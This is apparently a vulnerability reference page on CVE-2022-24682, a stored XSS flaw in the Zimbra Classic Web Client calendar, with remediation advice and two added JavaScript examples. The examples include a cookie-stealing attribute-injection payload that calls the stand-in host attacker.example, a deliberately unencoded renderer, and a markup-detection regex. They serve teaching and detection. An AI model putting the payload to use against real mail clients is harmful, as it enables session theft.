What is Zimbra Collaboration Suite?
Zimbra Collaboration Suite (ZCS) is an enterprise email, calendar, and collaboration platform used by government agencies, military organisations, academic institutions, and enterprises globally. Its Classic Web Client renders HTML email content and ICS calendar data directly in the user's browser — processing content from untrusted external senders in the context of an authenticated user session. Any JavaScript that executes in this context has full access to the session's authentication tokens, email archive, contacts, and calendar data.
CVE-2022-24682 is the first XSS vulnerability in the CISA Known Exploited Vulnerabilities catalog for Zimbra's Classic UI, and the beginning of a pattern in which the same architectural weakness (untrusted mail and calendar content rendered inside an authenticated webmail session) was exploited by different threat actors in the years that followed.
Overview
CVE-2022-24682 is a stored cross-site scripting (XSS) vulnerability in the Calendar feature of Zimbra Collaboration Suite 8.8.x. The Classic Web Client fails to encode attacker-supplied text before placing it inside HTML element attributes of the rendered calendar item, allowing an attacker to inject arbitrary JavaScript that executes when a victim opens or previews the item in their authenticated Zimbra session.
Affected Versions
| Status | Zimbra ZCS Version |
|---|---|
| Vulnerable | ZCS 8.8.x prior to 8.8.15 Patch 30 (Update 1) |
| Fixed | ZCS 8.8.15 Patch 30 (Update 1) and later |
Technical Details
The vulnerability exists in the Calendar feature of the Zimbra Classic Web Client. When Zimbra renders calendar event data, user-supplied text embedded within HTML element attributes is not encoded before being inserted into the document. Because the attribute value is not encoded, a double quote in the attacker's text terminates the attribute, and the remainder is parsed as new attributes or markup, including event-handler attributes that execute JavaScript. This is the output-encoding failure classified as CWE-116.
Attack characteristics:
- Authentication required: No (CVSS PR:N). The attacker needs no Zimbra account; the malicious calendar item is delivered by email from any external sender.
- User interaction: Required (UI:R). The victim must open or preview the calendar item in the Classic Web Client.
- Execution context: the victim's authenticated Zimbra session. The attacker's script runs with access to the session cookie, mailbox contents, and contacts.
The attack delivers a malicious calendar invitation to the victim's Zimbra inbox. When the victim opens or previews the item in the Classic Web Client, the injected JavaScript executes. Observed post-exploitation actions include theft of session cookies, email contents, and attachments.
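The attribute-context encoding failure described above, as an added example that is not Zimbra's code: a toy calendar-preview renderer that interpolates invitation fields straight into HTML, beside a version that encodes for the attribute and text-node contexts. The invitation fields, the attacker.example host, and the helper names are constructed for illustration; the small attribute tokenizer at the end exists only so the two outputs can be compared the way a browser's tokenizer would see them.

```javascript
// Added example, not Zimbra code. Reproduces the class of bug behind
// CVE-2022-24682 (CWE-116) in a minimal calendar-preview renderer.

// Constructed sample invitation: SUMMARY and LOCATION are attacker-controlled.
// LOCATION breaks out of a quoted attribute; SUMMARY injects a tag into a text node.
const invite = {
  summary: 'Budget sync <img src=x onerror="alert(document.cookie)">',
  location: 'Room 4" onmouseover="fetch(\'https://attacker.example/?c=\'+document.cookie)',
  organizer: 'attacker@attacker.example', // placeholder address
};

// Vulnerable: untrusted text is interpolated into an attribute and a text node
// without encoding. The double quote in `location` closes title="..." and the
// rest becomes a new onmouseover attribute; the <img> in `summary` becomes a tag.
function renderApptVulnerable(ev) {
  return `<div class="appt" title="${ev.location}">` +
         `<span class="summary">${ev.summary}</span></div>`;
}

// Hardened: encode the five HTML-significant characters. After encoding, a
// quote can no longer terminate an attribute and '<' can no longer open a tag.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderApptSafe(ev) {
  return `<div class="appt" title="${escapeHtml(ev.location)}">` +
         `<span class="summary">${escapeHtml(ev.summary)}</span></div>`;
}

// Tiny tokenizer for the first tag's attribute names, following the rule that a
// quoted value runs until its matching quote. Used to show how the two outputs
// differ structurally rather than just textually.
function openTagAttributeNames(html) {
  const names = [];
  const isWs = (c) => c === ' ' || c === '\t' || c === '\n';
  let i = html.indexOf(' ');                 // just past the tag name
  if (i < 0) return names;
  while (i < html.length && html[i] !== '>') {
    while (isWs(html[i])) i++;
    if (i >= html.length || html[i] === '>') break;
    let name = '';
    while (i < html.length && !isWs(html[i]) && html[i] !== '=' && html[i] !== '>') name += html[i++];
    names.push(name.toLowerCase());
    while (isWs(html[i])) i++;
    if (html[i] === '=') {
      i++;
      while (isWs(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < html.length && html[i] !== q) i++;       // quoted value
        i++;
      } else {
        while (i < html.length && !isWs(html[i]) && html[i] !== '>') i++; // unquoted value
      }
    }
  }
  return names;
}

console.log('vulnerable attrs:', openTagAttributeNames(renderApptVulnerable(invite)));
console.log('hardened  attrs:', openTagAttributeNames(renderApptSafe(invite)));
```

The vulnerable output carries three attributes on the outer element (class, title, and the injected onmouseover) and a live img tag; the hardened output carries two and no tag. In a real client the stronger fix is to avoid building HTML strings at all and assign untrusted values through DOM properties such as `title` and `textContent`, which never pass through the HTML parser.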
Discovery
Volexity researchers, who observed the exploitation, publicly disclosed the vulnerability on February 3, 2022. Zimbra issued a fix the following day, February 4, 2022, and CISA added the CVE to the KEV catalog three weeks later on February 25. The NVD notes that exploitation was observed in the wild starting in December 2021, roughly two months before a fix was available, indicating a zero-day exploitation window.
Exploitation Context
CVE-2022-24682 was one of several Zimbra CVEs actively exploited in early-to-mid 2022, documented in CISA/MS-ISAC advisory AA22-228A. The advisory notes that malicious actors were exploiting the vulnerability to steal Zimbra session cookie files — providing persistent authenticated access to victims' webmail without requiring their passwords.
CISA's ransomware flag indicates that CVE-2022-24682 was exploited not only for intelligence collection but as an initial access vector in ransomware operations — consistent with the pattern across the broader Zimbra KEV cluster, where the same webmail exposure attracted both state-sponsored intelligence actors and opportunistic financially motivated attackers.
Remediation
- Upgrade to ZCS 8.8.15 Patch 30 (Update 1) or later. The fix escapes HTML element attributes in calendar event rendering, preventing injection.
- Review session activity for users whose accounts may have received calendar invitations from external senders during the December 2021 to February 2022 exposure window. Look for unexpected authenticated API calls, newly created mail forwarding rules, or bulk mailbox access.
- Invalidate active sessions for potentially affected users to force re-authentication after patching, removing any stolen but still-valid session cookies.
- Monitor for ICS/calendar invitation delivery from unknown external senders as an ongoing detection signal for calendar-based XSS attacks.
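A triage routine for inbound invitations, as an added example that is not part of Zimbra or of the advisories cited here: it unfolds and parses an ICS body, flags an organizer outside an assumed set of internal domains (the external-sender signal above), and flags HTML or event-handler syntax inside text properties, which is the payload shape the vulnerability needs. The ICS sample, the corp.example and attacker.example domains, and the regex heuristic are constructed assumptions.

```javascript
// Added example, not Zimbra code. Flags the two signals named in the
// remediation list: external organizer, and markup inside calendar text.

const INTERNAL_DOMAINS = new Set(['corp.example']); // assumption: your own mail domains

// Constructed sample invitation. The LOCATION line is folded per RFC 5545
// (CRLF followed by a single space) to exercise the unfolding step.
const SAMPLE_ICS = [
  'BEGIN:VCALENDAR',
  'VERSION:2.0',
  'METHOD:REQUEST',
  'BEGIN:VEVENT',
  'UID:constructed-0001@attacker.example',
  'ORGANIZER;CN=Attacker:mailto:attacker@attacker.example',
  'SUMMARY:Budget sync',
  'LOCATION:Room 4" onmouseover="fetch(\'https://attacker.example/?c=\'+document',
  ' .cookie)',
  'DESCRIPTION:Agenda attached',
  'END:VEVENT',
  'END:VCALENDAR',
].join('\r\n');

// Heuristic for markup in what should be plain text: a tag opener, an
// on*= event-handler attribute, or a javascript: URL. Tuned for recall.
const MARKUP_RE = /<\s*[a-z!\/]|\bon[a-z]+\s*=|javascript\s*:/i;

// Text properties an attacker controls in an invitation.
const TEXT_PROPS = new Set(['SUMMARY', 'DESCRIPTION', 'LOCATION', 'COMMENT']);

// Unfold continuation lines, then split each content line into name, params
// and value. Simplification: parameter values containing ':' are not handled.
function parseIcs(text) {
  const unfolded = text.replace(/\r?\n[ \t]/g, '');
  const props = [];
  for (const line of unfolded.split(/\r?\n/)) {
    if (!line) continue;
    const colon = line.indexOf(':');
    if (colon < 0) continue;
    const [name, ...params] = line.slice(0, colon).split(';');
    props.push({ name: name.toUpperCase(), params, value: line.slice(colon + 1) });
  }
  return props;
}

// Returns a list of findings; an empty list means neither signal fired.
function triageInvite(icsText, internalDomains = INTERNAL_DOMAINS) {
  const findings = [];
  for (const p of parseIcs(icsText)) {
    if (p.name === 'ORGANIZER') {
      const addr = p.value.replace(/^mailto:/i, '').toLowerCase();
      const domain = addr.split('@')[1] || '';
      if (!internalDomains.has(domain)) {
        findings.push({ prop: 'ORGANIZER', reason: 'external organizer', evidence: addr });
      }
    }
    if (TEXT_PROPS.has(p.name) && MARKUP_RE.test(p.value)) {
      findings.push({ prop: p.name, reason: 'markup in text property', evidence: p.value.match(MARKUP_RE)[0] });
    }
  }
  return findings;
}

console.log(JSON.stringify(triageInvite(SAMPLE_ICS), null, 2));
```

Run against the sample, the routine reports the external organizer and the `onmouseover=` fragment hidden across the folded LOCATION line; unfolding first matters because a scanner that works line by line would see only `document` on one line and `.cookie)` on the next. An external organizer alone is normal business traffic, so it is a signal to correlate with the markup finding or with the post-patch session review, not an alert on its own.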
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2022-24682 |
| Vendor / Product | Synacor — Zimbra Collaboration Suite (ZCS) |
| NVD Published | 2022-02-09 |
| NVD Last Modified | 2025-11-04 |
| CVSS 3.1 Score | 6.1 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| Severity | MEDIUM |
| CWE | CWE-116 — Improper Encoding or Escaping of Output |
| CISA KEV Added | 2022-02-25 |
| CISA KEV Deadline | 2022-03-11 |
| Known Ransomware Use | ⚠️ Yes |
CVSS 3.1 Breakdown
| Metric | Value | Meaning for this CVE |
|---|---|---|
| Attack Vector (AV) | Network (N) | Payload is delivered over email to the webmail client |
| Attack Complexity (AC) | Low (L) | No special conditions beyond delivering the calendar item |
| Privileges Required (PR) | None (N) | Attacker needs no Zimbra account |
| User Interaction (UI) | Required (R) | Victim must open or preview the calendar item |
| Scope (S) | Changed (C) | Script executes in the victim's browser session, not in the vulnerable server component |
| Confidentiality (C) | Low (L) | Session cookie and mailbox data readable by the injected script |
| Integrity (I) | Low (L) | Actions can be taken in the victim's session (e.g. forwarding rules) |
| Availability (A) | None (N) | No availability impact |
Required Action
Upgrade to ZCS 8.8.15 Patch 30 (Update 1) or later. Under BOD 22-01 the CISA KEV remediation deadline for federal civilian agencies was 2022-03-11.
Timeline
| Date | Event |
|---|---|
| December 2021 | Active exploitation observed in the wild (NVD: 'as exploited in the wild starting in December 2021'; exact day not given) |
| 2022-02-03 | Volexity publicly discloses active exploitation of the then-unpatched vulnerability |
| 2022-02-04 | Zimbra releases fix: ZCS 8.8.15 Patch 30 (Update 1) |
| 2022-02-25 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-03-11 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2022-24682 | Vulnerability Database |
| Zimbra Security Center | Vendor Advisory / Patch |
| CISA/MS-ISAC Advisory AA22-228A — Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite | US Government |
| CISA KEV Catalog Entry | US Government |
| CISA BOD 22-01 | Remediation Directive |
| CWE-116 — Improper Encoding or Escaping of Output | Weakness Classification |